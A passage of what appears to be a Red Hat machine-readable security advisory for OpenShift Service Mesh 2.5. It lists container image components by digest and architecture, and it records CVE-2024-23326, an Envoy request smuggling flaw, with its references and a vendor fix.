"openshift-service-mesh/istio-cni-rhel8@sha256:2784045844231bcd2212f84d0ae05aace9b8e0fe31ce5c3a49c1e865d9b6f7b4_s390x", relates_to_product_reference: "8Base-RHOSSM-2.5", }, { category: "default_component_of", full_product_name: { name: "openshift-service-mesh/istio-cni-rhel8@sha256:40c8bfb02b7078d04f115fcd4894cc4f4b452f1e192afac3fe2db2f9249eca42_amd64 as a component of RHOSSM 2.5 for RHEL 8", product_id: "8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:40c8bfb02b7078d04f115fcd4894cc4f4b452f1e192afac3fe2db2f9249eca42_amd64", }, product_reference: "openshift-service-mesh/istio-cni-rhel8@sha256:40c8bfb02b7078d04f115fcd4894cc4f4b452f1e192afac3fe2db2f9249eca42_amd64", relates_to_product_reference: "8Base-RHOSSM-2.5", }, { category: "default_component_of", full_product_name: { name: "openshift-service-mesh/istio-cni-rhel8@sha256:58dc105a4b89b8eed3892f577595577f3972431e81636609218bd87d300ec662_ppc64le as a component of RHOSSM 2.5 for RHEL 8", product_id: "8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:58dc105a4b89b8eed3892f577595577f3972431e81636609218bd87d300ec662_ppc64le", }, product_reference: "openshift-service-mesh/istio-cni-rhel8@sha256:58dc105a4b89b8eed3892f577595577f3972431e81636609218bd87d300ec662_ppc64le", relates_to_product_reference: "8Base-RHOSSM-2.5", }, { category: "default_component_of", full_product_name: { name: "openshift-service-mesh/istio-cni-rhel8@sha256:aee0aa13cd55c4dbebde559f90123c575a222bff48cef4a29d57efcca3ec3831_arm64 as a component of RHOSSM 2.5 for RHEL 8", product_id: "8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:aee0aa13cd55c4dbebde559f90123c575a222bff48cef4a29d57efcca3ec3831_arm64", }, product_reference: "openshift-service-mesh/istio-cni-rhel8@sha256:aee0aa13cd55c4dbebde559f90123c575a222bff48cef4a29d57efcca3ec3831_arm64", relates_to_product_reference: "8Base-RHOSSM-2.5", }, { category: "default_component_of", full_product_name: { name: "openshift-service-mesh/istio-must-gather-rhel8@sha256:0e4a75f9a16266a79814f42f1ac475fe426b6720c52daa98df594a979a1e727d_s390x as a component of RHOSSM 2.5 for RHEL 8", product_id: "8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:0e4a75f9a16266a79814f42f1ac475fe426b6720c52daa98df594a979a1e727d_s390x", }, product_reference: "openshift-service-mesh/istio-must-gather-rhel8@sha256:0e4a75f9a16266a79814f42f1ac475fe426b6720c52daa98df594a979a1e727d_s390x", relates_to_product_reference: "8Base-RHOSSM-2.5", }, { category: "default_component_of", full_product_name: { name: "openshift-service-mesh/istio-must-gather-rhel8@sha256:597475e28f081bd14755ca909fceb2dd1c01c6a3d1b7e1b6f89739c1206c7f9b_arm64 as a component of RHOSSM 2.5 for RHEL 8", product_id: "8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:597475e28f081bd14755ca909fceb2dd1c01c6a3d1b7e1b6f89739c1206c7f9b_arm64", }, product_reference: "openshift-service-mesh/istio-must-gather-rhel8@sha256:597475e28f081bd14755ca909fceb2dd1c01c6a3d1b7e1b6f89739c1206c7f9b_arm64", relates_to_product_reference: "8Base-RHOSSM-2.5", }, { category: "default_component_of", full_product_name: { name: "openshift-service-mesh/istio-must-gather-rhel8@sha256:913b90b39c5f78b328c202630f43f41daa8ba1e132411679a1dc655f3992b265_ppc64le as a component of RHOSSM 2.5 for RHEL 8", product_id: "8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:913b90b39c5f78b328c202630f43f41daa8ba1e132411679a1dc655f3992b265_ppc64le", }, product_reference: "openshift-service-mesh/istio-must-gather-rhel8@sha256:913b90b39c5f78b328c202630f43f41daa8ba1e132411679a1dc655f3992b265_ppc64le", relates_to_product_reference: "8Base-RHOSSM-2.5", }, { category: "default_component_of", full_product_name: { name: "openshift-service-mesh/istio-must-gather-rhel8@sha256:a14488ddf9859b13676abb82bbc9925e3b65baedbeff46657c4754c9486e14d9_amd64 as a component of RHOSSM 2.5 for RHEL 8", product_id: "8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:a14488ddf9859b13676abb82bbc9925e3b65baedbeff46657c4754c9486e14d9_amd64", }, product_reference: "openshift-service-mesh/istio-must-gather-rhel8@sha256:a14488ddf9859b13676abb82bbc9925e3b65baedbeff46657c4754c9486e14d9_amd64", relates_to_product_reference: "8Base-RHOSSM-2.5", }, { category: "default_component_of", full_product_name: { name: "openshift-service-mesh/kiali-ossmc-rhel8@sha256:013dda8dba6f8aab89e4a10e4289362751dd14d01704604199ba36c29316c10c_s390x as a component of RHOSSM 2.5 for RHEL 8", product_id: "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:013dda8dba6f8aab89e4a10e4289362751dd14d01704604199ba36c29316c10c_s390x", }, product_reference: "openshift-service-mesh/kiali-ossmc-rhel8@sha256:013dda8dba6f8aab89e4a10e4289362751dd14d01704604199ba36c29316c10c_s390x", relates_to_product_reference: "8Base-RHOSSM-2.5", }, { category: "default_component_of", full_product_name: { name: "openshift-service-mesh/kiali-ossmc-rhel8@sha256:b17bed92b891131e3bed248ff4fa8329e6802cbcc6b07aac240cf8f95e6fa48b_amd64 as a component of RHOSSM 2.5 for RHEL 8", product_id: "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:b17bed92b891131e3bed248ff4fa8329e6802cbcc6b07aac240cf8f95e6fa48b_amd64", }, product_reference: "openshift-service-mesh/kiali-ossmc-rhel8@sha256:b17bed92b891131e3bed248ff4fa8329e6802cbcc6b07aac240cf8f95e6fa48b_amd64", relates_to_product_reference: "8Base-RHOSSM-2.5", }, { category: "default_component_of", full_product_name: { name: "openshift-service-mesh/kiali-ossmc-rhel8@sha256:ce420c9b076a15d91c9e62000d4129911d54db27a4c91913e384eb284557edae_ppc64le as a component of RHOSSM 2.5 for RHEL 8", product_id: "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:ce420c9b076a15d91c9e62000d4129911d54db27a4c91913e384eb284557edae_ppc64le", }, product_reference: "openshift-service-mesh/kiali-ossmc-rhel8@sha256:ce420c9b076a15d91c9e62000d4129911d54db27a4c91913e384eb284557edae_ppc64le", relates_to_product_reference: "8Base-RHOSSM-2.5", }, { category: "default_component_of", full_product_name: { name: "openshift-service-mesh/kiali-ossmc-rhel8@sha256:dea5fd5d8ce03c54d40301ca4dd2ba23a9f61f9edbfa8565ff0ccb369b811e55_arm64 as a component of RHOSSM 2.5 for RHEL 8", product_id: "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:dea5fd5d8ce03c54d40301ca4dd2ba23a9f61f9edbfa8565ff0ccb369b811e55_arm64", }, product_reference: "openshift-service-mesh/kiali-ossmc-rhel8@sha256:dea5fd5d8ce03c54d40301ca4dd2ba23a9f61f9edbfa8565ff0ccb369b811e55_arm64", relates_to_product_reference: "8Base-RHOSSM-2.5", }, { category: "default_component_of", full_product_name: { name: "openshift-service-mesh/kiali-rhel8@sha256:31242f9c6c8bf429d4b11ca458b83a2931c95e6032676b76948e84acfd1f4ace_amd64 as a component of RHOSSM 2.5 for RHEL 8", product_id: "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:31242f9c6c8bf429d4b11ca458b83a2931c95e6032676b76948e84acfd1f4ace_amd64", }, product_reference: "openshift-service-mesh/kiali-rhel8@sha256:31242f9c6c8bf429d4b11ca458b83a2931c95e6032676b76948e84acfd1f4ace_amd64", relates_to_product_reference: "8Base-RHOSSM-2.5", }, { category: "default_component_of", full_product_name: { name: "openshift-service-mesh/kiali-rhel8@sha256:4f1bf796330b85789da7622a41da8dfba144121864936f5a978a789f31471805_arm64 as a component of RHOSSM 2.5 for RHEL 8", product_id: "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:4f1bf796330b85789da7622a41da8dfba144121864936f5a978a789f31471805_arm64", }, product_reference: "openshift-service-mesh/kiali-rhel8@sha256:4f1bf796330b85789da7622a41da8dfba144121864936f5a978a789f31471805_arm64", relates_to_product_reference: "8Base-RHOSSM-2.5", }, { category: "default_component_of", full_product_name: { name: "openshift-service-mesh/kiali-rhel8@sha256:9c52215736668ee145e505fafb22e1feec36cb526168a9268d3bb2e3d236a2b8_s390x as a component of RHOSSM 2.5 for RHEL 8", product_id: "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:9c52215736668ee145e505fafb22e1feec36cb526168a9268d3bb2e3d236a2b8_s390x", }, product_reference: "openshift-service-mesh/kiali-rhel8@sha256:9c52215736668ee145e505fafb22e1feec36cb526168a9268d3bb2e3d236a2b8_s390x", relates_to_product_reference: "8Base-RHOSSM-2.5", }, { category: "default_component_of", full_product_name: { name: "openshift-service-mesh/kiali-rhel8@sha256:d8ba5cb7d2e2ecfbf226ee7b880c750a8006b3648f4bd9eace3b3bfa60aa98a2_ppc64le as a component of RHOSSM 2.5 for RHEL 8", product_id: "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:d8ba5cb7d2e2ecfbf226ee7b880c750a8006b3648f4bd9eace3b3bfa60aa98a2_ppc64le", }, product_reference: "openshift-service-mesh/kiali-rhel8@sha256:d8ba5cb7d2e2ecfbf226ee7b880c750a8006b3648f4bd9eace3b3bfa60aa98a2_ppc64le", relates_to_product_reference: "8Base-RHOSSM-2.5", }, { category: "default_component_of", full_product_name: { name: "openshift-service-mesh/pilot-rhel8@sha256:5ceb0e239b8fb78edbb3f18ad522bbde2dc949b0847200c9a8a601631dc00301_ppc64le as a component of RHOSSM 2.5 for RHEL 8", product_id: "8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:5ceb0e239b8fb78edbb3f18ad522bbde2dc949b0847200c9a8a601631dc00301_ppc64le", }, product_reference: "openshift-service-mesh/pilot-rhel8@sha256:5ceb0e239b8fb78edbb3f18ad522bbde2dc949b0847200c9a8a601631dc00301_ppc64le", relates_to_product_reference: "8Base-RHOSSM-2.5", }, { category: "default_component_of", full_product_name: { name: "openshift-service-mesh/pilot-rhel8@sha256:c20112f355c939e97a44229056277da2ce68511ed65bd19868707efd89444dbb_arm64 as a component of RHOSSM 2.5 for RHEL 8", product_id: "8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:c20112f355c939e97a44229056277da2ce68511ed65bd19868707efd89444dbb_arm64", }, product_reference: "openshift-service-mesh/pilot-rhel8@sha256:c20112f355c939e97a44229056277da2ce68511ed65bd19868707efd89444dbb_arm64", relates_to_product_reference: "8Base-RHOSSM-2.5", }, { category: "default_component_of", full_product_name: { name: "openshift-service-mesh/pilot-rhel8@sha256:cea91c8c067cdfd4a321895eaef62fa914a65a204e687e59cb9d8f3f03cbd2cd_amd64 as a component of RHOSSM 2.5 for RHEL 8", product_id: "8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:cea91c8c067cdfd4a321895eaef62fa914a65a204e687e59cb9d8f3f03cbd2cd_amd64", }, product_reference: "openshift-service-mesh/pilot-rhel8@sha256:cea91c8c067cdfd4a321895eaef62fa914a65a204e687e59cb9d8f3f03cbd2cd_amd64", relates_to_product_reference: "8Base-RHOSSM-2.5", }, { category: "default_component_of", full_product_name: { name: "openshift-service-mesh/pilot-rhel8@sha256:eebb1aef0d32db79f88ea74caeefbd13aa00a2cd39726f7b9996f0a381fdd5fa_s390x as a component of RHOSSM 2.5 for RHEL 8", product_id: "8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:eebb1aef0d32db79f88ea74caeefbd13aa00a2cd39726f7b9996f0a381fdd5fa_s390x", }, product_reference: "openshift-service-mesh/pilot-rhel8@sha256:eebb1aef0d32db79f88ea74caeefbd13aa00a2cd39726f7b9996f0a381fdd5fa_s390x", relates_to_product_reference: "8Base-RHOSSM-2.5", }, { category: "default_component_of", full_product_name: { name: "openshift-service-mesh/proxyv2-rhel8@sha256:203fa7f4d917e0bad625691aaa9a060a902995d4a905c04514d907fd11858e79_arm64 as a component of RHOSSM 2.5 for RHEL 8", product_id: "8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:203fa7f4d917e0bad625691aaa9a060a902995d4a905c04514d907fd11858e79_arm64", }, product_reference: "openshift-service-mesh/proxyv2-rhel8@sha256:203fa7f4d917e0bad625691aaa9a060a902995d4a905c04514d907fd11858e79_arm64", relates_to_product_reference: "8Base-RHOSSM-2.5", }, { category: "default_component_of", full_product_name: { name: "openshift-service-mesh/proxyv2-rhel8@sha256:95f289d7a5fb1c6e6dc1eb424605bbcab484ea39222bdb4f86bf8932fdaa0bd2_s390x as a component of RHOSSM 2.5 for RHEL 8", product_id: "8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:95f289d7a5fb1c6e6dc1eb424605bbcab484ea39222bdb4f86bf8932fdaa0bd2_s390x", }, product_reference: "openshift-service-mesh/proxyv2-rhel8@sha256:95f289d7a5fb1c6e6dc1eb424605bbcab484ea39222bdb4f86bf8932fdaa0bd2_s390x", relates_to_product_reference: "8Base-RHOSSM-2.5", }, { category: "default_component_of", full_product_name: { name: "openshift-service-mesh/proxyv2-rhel8@sha256:c922a8a50ed805f36822a1e5906c31c41123070f589177a7e95934c94c29befc_amd64 as a component of RHOSSM 2.5 for RHEL 8", product_id: "8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:c922a8a50ed805f36822a1e5906c31c41123070f589177a7e95934c94c29befc_amd64", }, product_reference: "openshift-service-mesh/proxyv2-rhel8@sha256:c922a8a50ed805f36822a1e5906c31c41123070f589177a7e95934c94c29befc_amd64", relates_to_product_reference: "8Base-RHOSSM-2.5", }, { category: "default_component_of", full_product_name: { name: "openshift-service-mesh/proxyv2-rhel8@sha256:c93cc0a574fe8d4c8af5fae3955497a09aa718494cae342da881ed43aafad35a_ppc64le as a component of RHOSSM 2.5 for RHEL 8", product_id: "8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:c93cc0a574fe8d4c8af5fae3955497a09aa718494cae342da881ed43aafad35a_ppc64le", }, product_reference: "openshift-service-mesh/proxyv2-rhel8@sha256:c93cc0a574fe8d4c8af5fae3955497a09aa718494cae342da881ed43aafad35a_ppc64le", relates_to_product_reference: "8Base-RHOSSM-2.5", }, { category: "default_component_of", full_product_name: { name: "openshift-service-mesh/ratelimit-rhel8@sha256:39271db703a21bf1dd5013d21b991119a7c576c3e9b9d057bdae3d38d84c8679_ppc64le as a component of RHOSSM 2.5 for RHEL 8", product_id: "8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:39271db703a21bf1dd5013d21b991119a7c576c3e9b9d057bdae3d38d84c8679_ppc64le", }, product_reference: "openshift-service-mesh/ratelimit-rhel8@sha256:39271db703a21bf1dd5013d21b991119a7c576c3e9b9d057bdae3d38d84c8679_ppc64le", relates_to_product_reference: "8Base-RHOSSM-2.5", }, { category: "default_component_of", full_product_name: { name: "openshift-service-mesh/ratelimit-rhel8@sha256:566e4e1b3973d75f13f6efeea02bacc6f687b3ec72a09ca94bab6f37a73a4c60_amd64 as a component of RHOSSM 2.5 for RHEL 8", product_id: "8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:566e4e1b3973d75f13f6efeea02bacc6f687b3ec72a09ca94bab6f37a73a4c60_amd64", }, product_reference: "openshift-service-mesh/ratelimit-rhel8@sha256:566e4e1b3973d75f13f6efeea02bacc6f687b3ec72a09ca94bab6f37a73a4c60_amd64", relates_to_product_reference: "8Base-RHOSSM-2.5", }, { category: "default_component_of", full_product_name: { name: "openshift-service-mesh/ratelimit-rhel8@sha256:98e2b3ad04539728d36ace3eae0816582a930388a6a5903a9175110aa1ee1e83_s390x as a component of RHOSSM 2.5 for RHEL 8", product_id: "8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:98e2b3ad04539728d36ace3eae0816582a930388a6a5903a9175110aa1ee1e83_s390x", }, product_reference: "openshift-service-mesh/ratelimit-rhel8@sha256:98e2b3ad04539728d36ace3eae0816582a930388a6a5903a9175110aa1ee1e83_s390x", relates_to_product_reference: "8Base-RHOSSM-2.5", }, { category: "default_component_of", full_product_name: { name: "openshift-service-mesh/ratelimit-rhel8@sha256:b1825622263dd1065be939d18d163bc8ba1b0c53158bc7805cc36507c44f830b_arm64 as a component of RHOSSM 2.5 for RHEL 8", product_id: "8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:b1825622263dd1065be939d18d163bc8ba1b0c53158bc7805cc36507c44f830b_arm64", }, product_reference: "openshift-service-mesh/ratelimit-rhel8@sha256:b1825622263dd1065be939d18d163bc8ba1b0c53158bc7805cc36507c44f830b_arm64", relates_to_product_reference: "8Base-RHOSSM-2.5", }, ], }, vulnerabilities: [ { cve: "CVE-2024-23326", cwe: { id: "CWE-444", name: "Inconsistent Interpretation of HTTP Requests ('HTTP Request/Response Smuggling')", }, discovery_date: "2024-01-19T00:00:00+00:00", ids: [ { system_name: "Red Hat Bugzilla ID", text: "2259228", }, ], notes: [ { category: "description", text: "A possible request smuggling vulnerability exists through Envoy. This issue occurs if a server can be tricked into adding an upgrade header into a response.", title: "Vulnerability description", }, { category: "summary", text: "envoy: Envoy incorrectly accepts HTTP 200 response for entering upgrade mode", title: "Vulnerability summary", }, { category: "general", text: "The CVSS score(s) listed for this vulnerability do not reflect the associated product's status, and are included for informational purposes to better understand the severity of this vulnerability.", title: "CVSS score applicability", }, ], product_status: { fixed: [ "8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:807b8705bdd289e7c538dad646cdb00619b60a547faabfc4462beb3669c9593b_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:c03cbaf1d6e8abd5f43bfa059359bd3da0e5ae0a5b4434f3d56eedceb238761c_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:f18469f64f1c87b3e9186db6a955f0063197d45781a570a31102ae0d23fff5b8_arm64", "8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:fdbac779cb1568b0eb9bc7a8f194a446583b08fa68f7d5f1dcd3ba31d4e2c14f_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:2784045844231bcd2212f84d0ae05aace9b8e0fe31ce5c3a49c1e865d9b6f7b4_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:40c8bfb02b7078d04f115fcd4894cc4f4b452f1e192afac3fe2db2f9249eca42_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:58dc105a4b89b8eed3892f577595577f3972431e81636609218bd87d300ec662_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:aee0aa13cd55c4dbebde559f90123c575a222bff48cef4a29d57efcca3ec3831_arm64", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:0e4a75f9a16266a79814f42f1ac475fe426b6720c52daa98df594a979a1e727d_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:597475e28f081bd14755ca909fceb2dd1c01c6a3d1b7e1b6f89739c1206c7f9b_arm64", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:913b90b39c5f78b328c202630f43f41daa8ba1e132411679a1dc655f3992b265_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:a14488ddf9859b13676abb82bbc9925e3b65baedbeff46657c4754c9486e14d9_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:013dda8dba6f8aab89e4a10e4289362751dd14d01704604199ba36c29316c10c_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:b17bed92b891131e3bed248ff4fa8329e6802cbcc6b07aac240cf8f95e6fa48b_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:ce420c9b076a15d91c9e62000d4129911d54db27a4c91913e384eb284557edae_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:dea5fd5d8ce03c54d40301ca4dd2ba23a9f61f9edbfa8565ff0ccb369b811e55_arm64", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:31242f9c6c8bf429d4b11ca458b83a2931c95e6032676b76948e84acfd1f4ace_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:4f1bf796330b85789da7622a41da8dfba144121864936f5a978a789f31471805_arm64", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:9c52215736668ee145e505fafb22e1feec36cb526168a9268d3bb2e3d236a2b8_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:d8ba5cb7d2e2ecfbf226ee7b880c750a8006b3648f4bd9eace3b3bfa60aa98a2_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:5ceb0e239b8fb78edbb3f18ad522bbde2dc949b0847200c9a8a601631dc00301_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:c20112f355c939e97a44229056277da2ce68511ed65bd19868707efd89444dbb_arm64", "8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:cea91c8c067cdfd4a321895eaef62fa914a65a204e687e59cb9d8f3f03cbd2cd_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:eebb1aef0d32db79f88ea74caeefbd13aa00a2cd39726f7b9996f0a381fdd5fa_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:203fa7f4d917e0bad625691aaa9a060a902995d4a905c04514d907fd11858e79_arm64", "8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:95f289d7a5fb1c6e6dc1eb424605bbcab484ea39222bdb4f86bf8932fdaa0bd2_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:c922a8a50ed805f36822a1e5906c31c41123070f589177a7e95934c94c29befc_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:c93cc0a574fe8d4c8af5fae3955497a09aa718494cae342da881ed43aafad35a_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:39271db703a21bf1dd5013d21b991119a7c576c3e9b9d057bdae3d38d84c8679_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:566e4e1b3973d75f13f6efeea02bacc6f687b3ec72a09ca94bab6f37a73a4c60_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:98e2b3ad04539728d36ace3eae0816582a930388a6a5903a9175110aa1ee1e83_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:b1825622263dd1065be939d18d163bc8ba1b0c53158bc7805cc36507c44f830b_arm64", ], }, references: [ { category: "self", summary: "Canonical URL", url: "https://access.redhat.com/security/cve/CVE-2024-23326", }, { category: "external", summary: "RHBZ#2259228", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2259228", }, { category: "external", summary: "https://www.cve.org/CVERecord?id=CVE-2024-23326", url: "https://www.cve.org/CVERecord?id=CVE-2024-23326", }, { category: "external", summary: "https://nvd.nist.gov/vuln/detail/CVE-2024-23326", url: "https://nvd.nist.gov/vuln/detail/CVE-2024-23326", }, { category: "external", summary: "https://github.com/envoyproxy/envoy/security/advisories/GHSA-vcf8-7238-v74c", url: "https://github.com/envoyproxy/envoy/security/advisories/GHSA-vcf8-7238-v74c", }, ], release_date: "2024-06-04T00:00:00+00:00", remediations: [ { category: "vendor_fix", date: "2024-10-07T09:24:53+00:00", details: "Before applying this update, make sure all previously released errata relevant to your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258", product_ids: [ "8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:807b8705bdd289e7c538dad646cdb00619b60a547faabfc4462beb3669c9593b_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:c03cbaf1d6e8abd5f43bfa059359bd3da0e5ae0a5b4434f3d56eedceb238761c_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:f18469f64f1c87b3e9186db6a955f0063197d45781a570a31102ae0d23fff5b8_arm64", "8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:fdbac779cb1568b0eb9bc7a8f194a446583b08fa68f7d5f1dcd3ba31d4e2c14f_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:2784045844231bcd2212f84d0ae05aace9b8e0fe31ce5c3a49c1e865d9b6f7b4_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:40c8bfb02b7078d04f115fcd4894cc4f4b452f1e192afac3fe2db2f9249eca42_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:58dc105a4b89b8eed3892f577595577f3972431e81636609218bd87d300ec662_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:aee0aa13cd55c4dbebde559f90123c575a222bff48cef4a29d57efcca3ec3831_arm64", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:0e4a75f9a16266a79814f42f1ac475fe426b6720c52daa98df594a979a1e727d_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:597475e28f081bd14755ca909fceb2dd1c01c6a3d1b7e1b6f89739c1206c7f9b_arm64", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:913b90b39c5f78b328c202630f43f41daa8ba1e132411679a1dc655f3992b265_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:a14488ddf9859b13676abb82bbc9925e3b65baedbeff46657c4754c9486e14d9_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:013dda8dba6f8aab89e4a10e4289362751dd14d01704604199ba36c29316c10c_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:b17bed92b891131e3bed248ff4fa8329e6802cbcc6b07aac240cf8f95e6fa48b_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:ce420c9b076a15d91c9e62000d4129911d54db27a4c91913e384eb284557edae_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:dea5fd5d8ce03c54d40301ca4dd2ba23a9f61f9edbfa8565ff0ccb369b811e55_arm64", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:31242f9c6c8bf429d4b11ca458b83a2931c95e6032676b76948e84acfd1f4ace_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:4f1bf796330b85789da7622a41da8dfba144121864936f5a978a789f31471805_arm64", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:9c52215736668ee145e505fafb22e1feec36cb526168a9268d3bb2e3d236a2b8_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:d8ba5cb7d2e2ecfbf226ee7b880c750a8006b3648f4bd9eace3b3bfa60aa98a2_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:5ceb0e239b8fb78edbb3f18ad522bbde2dc949b0847200c9a8a601631dc00301_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:c20112f355c939e97a44229056277da2ce68511ed65bd19868707efd89444dbb_arm64", "8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:cea91c8c067cdfd4a321895eaef62fa914a65a204e687e59cb9d8f3f03cbd2cd_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:eebb1aef0d32db79f88ea74caeefbd13aa00a2cd39726f7b9996f0a381fdd5fa_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:203fa7f4d917e0bad625691aaa9a060a902995d4a905c04514d907fd11858e79_arm64", "8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:95f289d7a5fb1c6e6dc1eb424605bbcab484ea39222bdb4f86bf8932fdaa0bd2_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:c922a8a50ed805f36822a1e5906c31c41123070f589177a7e95934c94c29befc_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:c93cc0a574fe8d4c8af5fae3955497a09aa718494cae342da881ed43aafad35a_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:39271db703a21bf1dd5013d21b991119a7c576c3e9b9d057bdae3d38d84c8679_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:566e4e1b3973d75f13f6efeea02bacc6f687b3ec72a09ca94bab6f37a73a4c60_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:98e2b3ad04539728d36ace3eae0816582a930388a6a5903a9175110aa1ee1e83_s390x", 